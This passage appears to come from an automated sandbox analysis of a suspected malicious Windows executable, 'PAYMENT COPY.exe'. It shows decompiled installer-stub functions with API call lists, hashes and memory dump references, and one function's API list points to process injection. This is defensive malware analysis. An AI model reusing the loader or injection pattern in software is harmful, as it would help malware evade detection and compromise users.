					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x415f91
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                                    0x004032cf
                                                                    0x004032e2
                                                                    0x004032e7
                                                                    0x00403417
                                                                    0x00403419
                                                                    0x00000000
                                                                    0x0040341f
                                                                    0x004032f3
                                                                    0x00403306
                                                                    0x0040330c
                                                                    0x00403312
                                                                    0x0040331d
                                                                    0x00403322
                                                                    0x00403327
                                                                    0x0040332f
                                                                    0x00403331
                                                                    0x00403331
                                                                    0x0040333a
                                                                    0x00403341
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403347
                                                                    0x0040334d
                                                                    0x00403353
                                                                    0x00000000
                                                                    0x00403359
                                                                    0x0040335f
                                                                    0x0040337f
                                                                    0x00403384
                                                                    0x00403389
                                                                    0x0040338f
                                                                    0x00403395
                                                                    0x004033a6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033a8
                                                                    0x004033ae
                                                                    0x004033b0
                                                                    0x004033d3
                                                                    0x004033d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033db
                                                                    0x004033dd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033df
                                                                    0x004033df
                                                                    0x004033f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403401
                                                                    0x00000000
                                                                    0x00403401
                                                                    0x004033ba
                                                                    0x004033c1
                                                                    0x0040340e
                                                                    0x00403414
                                                                    0x00403414
                                                                    0x00000000
                                                                    0x00403414
                                                                    0x004033c3
                                                                    0x004033c9
                                                                    0x004033cf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403412
                                                                    0x00403412
                                                                    0x00000000
                                                                    0x00403412
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004032D3
                                                                      • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer$CountTick
                                                                    • String ID: `TA
                                                                    • API String ID: 1092082344-1754987364
                                                                    • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                    • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                    • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                    • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C33034, Relevance: 6.6, APIs: 4, Instructions: 561processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 72C33391
                                                                    • GetThreadContext.KERNELBASE(?,00010007), ref: 72C333B4
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 72C333D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThread
                                                                    • String ID:
                                                                    • API String ID: 2411489757-0
                                                                    • Opcode ID: 121b7bab5456a289939b47848a99af8a5c7468950a46016d47dd807709288a24
                                                                    • Instruction ID: 0540104c721aa917ef6b0964e92389c2bdac75896ef9f4e46bc96443c292a7ee
                                                                    • Opcode Fuzzy Hash: 121b7bab5456a289939b47848a99af8a5c7468950a46016d47dd807709288a24
                                                                    • Instruction Fuzzy Hash: 7E323831E40208AEEB22CFA8DC45BECBBB5BF44704F504896E509FB2A1D7705A94DB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                    0x0040209d
                                                                    0x0040209d
                                                                    0x004020a2
                                                                    0x004020a9
                                                                    0x00402164
                                                                    0x004022dd
                                                                    0x004022dd
                                                                    0x00402a5a
                                                                    0x00402a5d
                                                                    0x00402a69
                                                                    0x00402a69
                                                                    0x004020b8
                                                                    0x004020c2
                                                                    0x004020c5
                                                                    0x004020d4
                                                                    0x004020d8
                                                                    0x004020de
                                                                    0x004020e2
                                                                    0x0040215d
                                                                    0x00000000
                                                                    0x0040215d
                                                                    0x004020e4
                                                                    0x004020ed
                                                                    0x004020f1
                                                                    0x00402135
                                                                    0x004020f3
                                                                    0x004020f6
                                                                    0x004020f9
                                                                    0x00402129
                                                                    0x004020fb
                                                                    0x004020fe
                                                                    0x00402107
                                                                    0x00402109
                                                                    0x00402109
                                                                    0x00402107
                                                                    0x004020f9
                                                                    0x0040213d
                                                                    0x00402152
                                                                    0x00402152
                                                                    0x00000000
                                                                    0x0040213d
                                                                    0x004020c8
                                                                    0x004020ce
                                                                    0x004020d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2987980305-0
                                                                    • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                    • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                    • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                    • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                    0x004015bb
                                                                    0x004015c2
                                                                    0x004015c5
                                                                    0x004015ca
                                                                    0x004015ce
                                                                    0x004015d0
                                                                    0x004015d8
                                                                    0x004015da
                                                                    0x004015dc
                                                                    0x004015e0
                                                                    0x004015e3
                                                                    0x004015fb
                                                                    0x004015fc
                                                                    0x004015e5
                                                                    0x004015e5
                                                                    0x004015e8
                                                                    0x00000000
                                                                    0x004015f3
                                                                    0x004015f4
                                                                    0x004015f4
                                                                    0x004015e8
                                                                    0x00401603
                                                                    0x0040160a
                                                                    0x00401617
                                                                    0x00401617
                                                                    0x0040160c
                                                                    0x0040160d
                                                                    0x00401615
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401615
                                                                    0x0040160a
                                                                    0x0040161a
                                                                    0x0040161d
                                                                    0x0040161f
                                                                    0x00401620
                                                                    0x004015d0
                                                                    0x00401627
                                                                    0x00401652
                                                                    0x004022dd
                                                                    0x00401629
                                                                    0x0040162b
                                                                    0x00401636
                                                                    0x0040163c
                                                                    0x00401644
                                                                    0x0040164a
                                                                    0x0040164a
                                                                    0x00401644
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,76D7FA90,?,76D7F560,00405A35,?,76D7FA90,76D7F560,00000000), ref: 00405C8C
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                      • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                      • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040587D
                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp, xrefs: 00401631
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                    • API String ID: 1892508949-3107243751
                                                                    • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                    • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                    • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                    • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                    0x004031bb
                                                                    0x004031c4
                                                                    0x004031cd
                                                                    0x004031d1
                                                                    0x004031dc
                                                                    0x004031dc
                                                                    0x004031e4
                                                                    0x004031eb
                                                                    0x004031fd
                                                                    0x00403204
                                                                    0x004032a9
                                                                    0x004032a9
                                                                    0x00000000
                                                                    0x0040320a
                                                                    0x0040320d
                                                                    0x00403219
                                                                    0x0040321d
                                                                    0x004032b7
                                                                    0x004032b7
                                                                    0x00403223
                                                                    0x00403226
                                                                    0x00403285
                                                                    0x0040328b
                                                                    0x0040328d
                                                                    0x0040328d
                                                                    0x0040329f
                                                                    0x004032a7
                                                                    0x004032ae
                                                                    0x004032b1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403228
                                                                    0x0040322b
                                                                    0x00000000
                                                                    0x00403231
                                                                    0x00403236
                                                                    0x0040323d
                                                                    0x00403240
                                                                    0x00403242
                                                                    0x00403242
                                                                    0x0040324f
                                                                    0x00403259
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403262
                                                                    0x00403269
                                                                    0x00403281
                                                                    0x004032ab
                                                                    0x004032ab
                                                                    0x0040326b
                                                                    0x0040326b
                                                                    0x0040326e
                                                                    0x00403271
                                                                    0x00403277
                                                                    0x0040327d
                                                                    0x00000000
                                                                    0x0040327f
                                                                    0x00000000
                                                                    0x0040327f
                                                                    0x0040327d
                                                                    0x00000000
                                                                    0x00403269
                                                                    0x00000000
                                                                    0x00403236
                                                                    0x0040322b
                                                                    0x00403226
                                                                    0x0040321d
                                                                    0x00403204
                                                                    0x004032b9
                                                                    0x004032bc

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                    • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                    • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                    • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}











                                                                    0x0040138a
                                                                    0x004013fa
                                                                    0x0040139b
                                                                    0x004013a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004013a2
                                                                    0x004013a3
                                                                    0x004013ad
                                                                    0x00000000
                                                                    0x00401404
                                                                    0x004013b0
                                                                    0x004013b7
                                                                    0x004013bd
                                                                    0x004013be
                                                                    0x004013c0
                                                                    0x004013c2
                                                                    0x004013b9
                                                                    0x004013b9
                                                                    0x004013ba
                                                                    0x004013ba
                                                                    0x004013c9
                                                                    0x004013cb
                                                                    0x004013f4
                                                                    0x004013f4
                                                                    0x004013c9
                                                                    0x00000000

                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageA.USER32 ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                    • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                    • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                    • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                    0x0040665e
                                                                    0x00406661
                                                                    0x00406668
                                                                    0x00406670
                                                                    0x0040667c
                                                                    0x00000000
                                                                    0x00406683
                                                                    0x00406673
                                                                    0x0040667a
                                                                    0x00000000
                                                                    0x0040668b
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                      • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                      • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                      • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                    • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                    • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                    • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                    0x00405dea
                                                                    0x00405df7
                                                                    0x00405e0c
                                                                    0x00405e12

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PAYMENT COPY.exe,80000000,00000003), ref: 00405DEA
                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    Memory Dump Source
